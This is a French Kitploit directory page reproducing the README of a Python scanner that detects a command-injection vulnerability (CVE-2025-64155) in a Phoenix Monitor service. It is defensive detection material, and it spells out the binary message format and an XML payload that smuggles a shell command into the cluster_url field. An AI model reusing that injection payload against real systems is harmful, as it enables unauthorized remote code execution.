Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/purehate/cve-2025-64155-hunter
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-hunter

Voir le dépôt
12il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-64155 Scanner

Un scanner Python pour détecter la vulnérabilité d'injection de commandes (CVE-2025-64155) dans le service Phoenix Monitor.

Description

CVE-2025-64155 est une vulnérabilité d'injection de commandes dans le service Phoenix Monitor qui permet l'exécution de code à distance via le paramètre cluster_url dans la commande handleStorageRequest (ID de commande : 1075724911).

La vulnérabilité se produit lorsque l'entrée contrôlée par l'utilisateur dans le champ cluster_url est transmise à une commande shell sans assainissement approprié, permettant une injection de commandes via des métacaractères shell.

Ce scanner est basé sur la recherche d'exploit de Horizon3AI.

Fonctionnalités

  • Détection basée sur le temps : utilise une méthode de détection sûre et non destructive basée sur le temps
  • Prise en charge SSL/TLS : gère les connexions SSL avec contournement de la validation des certificats
  • Mode verbeux : sortie détaillée pour le débogage
  • Vérification du service : option pour vérifier si le service est accessible sans tester la vulnérabilité

Prérequis

  • Python 3.6+
  • Bibliothèque standard uniquement (aucune dépendance externe)

Utilisation

Analyse de base

root@kitploit:~
python3 scanner.py -t <target_ip>

Options avancées

root@kitploit:~
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only

Arguments de la ligne de commande

  • -t, --target : adresse IP ou nom d'hôte cible (obligatoire)
  • -p, --port : port du service Phoenix Monitor (défaut : 7900)
  • --timeout : délai d'expiration de connexion en secondes (défaut : 10)
  • -v, --verbose : active la sortie détaillée
  • --check-only : vérifie uniquement si le service est accessible

Fonctionnement

Le scanner utilise une méthode de détection basée sur le temps :

  1. Se connecte au service Phoenix Monitor via SSL/TLS
  2. Envoie une commande handleStorageRequest avec une charge utile malveillante contenant sleep 3 dans le champ cluster_url
  3. Mesure le temps de réponse
  4. Si la réponse est retardée d'environ 3 secondes, la cible est probablement vulnérable (la commande a été exécutée)

Cette méthode est sûre et non destructive : elle n'exécute pas de commandes nuisibles, seulement une commande sleep inoffensive à des fins de détection.

Exemple de sortie

Cible vulnérable

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)

Cible non vulnérable

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable

Détails techniques

Format du message

Le scanner envoie un message binaire avec la structure suivante :

root@kitploit:~
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload

Structure de la charge utile

La charge utile XML contient une injection de commandes dans le champ cluster_url :

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche. N'utilisez cet outil que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test. L'accès non autorisé à des systèmes informatiques est illégal.

Licence

Licence MIT - voir le fichier LICENSE pour plus de détails.

Télécharger l’outil